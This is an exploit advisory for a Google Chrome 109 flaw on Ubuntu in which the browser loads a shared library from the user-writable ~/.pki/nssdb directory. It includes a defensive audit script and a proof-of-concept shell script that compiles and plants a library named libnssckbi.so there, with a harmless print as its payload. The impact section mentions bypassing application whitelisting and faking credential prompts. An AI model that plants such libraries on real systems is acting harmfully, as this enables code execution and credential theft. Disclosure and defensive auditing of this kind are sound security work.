# Exploit Title: Google Chrome 109.0.5414.74 - Code Execution via missing lib file (Ubuntu)
# Product: Google Chrome
# Discovered by: Rafay Baloch and Muhammad Samak
# Version: 109.0.5414.74
# Impact: Moderate
# Company: Cyber Citadel
# Website: https://www.cybercitadel.com
# Tested on: Ubuntu 22.04.1
*Description*
Google Chrome attempts to load the shared library 'libnssckbi.so' from a user-writable location.
PATH: /home/$username/.pki/nssdb/libnssckbi.so
Because the directory on that path is writable by the user, code execution is possible by placing
a malicious shared library named `libnssckbi.so` at the specified path: Chrome looks for the
library there and loads it if it exists.
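The following audit helper is an added example for defenders and is not part of the original advisory. It checks the condition the description relies on: whether the per-user NSS database directory is writable and whether any shared object has been planted in it (no shared object is expected there; the legitimate libnssckbi.so ships system-wide). The function name `audit_nssdb`, its directory parameter and the return codes are assumptions made for this example; it is written for a GNU/Linux userland (`ls`, `id`).

```shell
#!/bin/sh
# audit_nssdb DIR
#   Return codes (chosen for this example):
#     0 = directory present, no shared objects found
#     1 = at least one .so found in DIR (investigate: it would be loaded by Chrome)
#     2 = DIR does not exist
audit_nssdb() {
    dir="$1"
    if [ ! -d "$dir" ]; then
        echo "[-] $dir does not exist"
        return 2
    fi
    if [ -w "$dir" ]; then
        # Expected for a home-directory path, but worth stating: anything the
        # user (or malware running as the user) drops here is picked up.
        echo "[!] $dir is writable by $(id -un)"
    fi
    found=0
    for f in "$dir"/*.so "$dir"/*.so.*; do
        # An unmatched glob is left as the literal pattern; skip it.
        [ -e "$f" ] || continue
        found=1
        echo "[!] unexpected shared object: $f"
        ls -ld "$f"
    done
    if [ "$found" -eq 0 ]; then
        echo "[+] no shared objects in $dir"
    fi
    return "$found"
}

# Usage: audit the real location from the advisory for the current user.
# audit_nssdb "$HOME/.pki/nssdb"
```

The check is deliberately path-based rather than name-based: a planted library could carry any name that a future version of the browser happens to look for, so any .so in the user-writable NSS directory is reported.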
*Exploit*
Following is the PoC that can be used to reproduce the issue:
#!/bin/sh
echo "\n\t\t\tGoogle-Chrome Shared Library Code Execution..."
echo "[*] Checking /.pki/nssdb PATH"
if [ -d "/home/haalim/.pki/nssdb" ]
then
    echo "[+] Directory Exists..."
    if [ -w "/home/haalim/.pki/nssdb" ]
    then
        echo "[+] Directory is writable..."
        echo "[+] Generating malicious File libnssckbi.so ..."
        # Write a minimal C source whose function f() is run as the library initializer
        echo "#define _GNU_SOURCE" > /home/haalim/.pki/nssdb/exploit.c
        echo "#include <unistd.h>" >> /home/haalim/.pki/nssdb/exploit.c
        echo "#include <stdio.h>" >> /home/haalim/.pki/nssdb/exploit.c
        echo "#include <stdlib.h>" >> /home/haalim/.pki/nssdb/exploit.c
        echo "void f() {" >> /home/haalim/.pki/nssdb/exploit.c
        echo 'printf("Code Executed............ TMGM :)\n");' >> /home/haalim/.pki/nssdb/exploit.c
        echo "}" >> /home/haalim/.pki/nssdb/exploit.c
        # Build the shared object with f() registered as its init routine (-Wl,-init,f)
        gcc -c -Wall -Werror -fpic /home/haalim/.pki/nssdb/exploit.c -o /home/haalim/.pki/nssdb/exploit.o
        gcc -shared -o /home/haalim/.pki/nssdb/libnssckbi.so -Wl,-init,f /home/haalim/.pki/nssdb/exploit.o
    fi
fi
Upon closing the browser window, the application loads the library and executes the malicious code.
*Impact*
An attacker can use this behavior to bypass application whitelisting rules.
This behavior can also lead to DoS attacks.
An attacker can also trick a victim into supplying credentials by creating a fake prompt.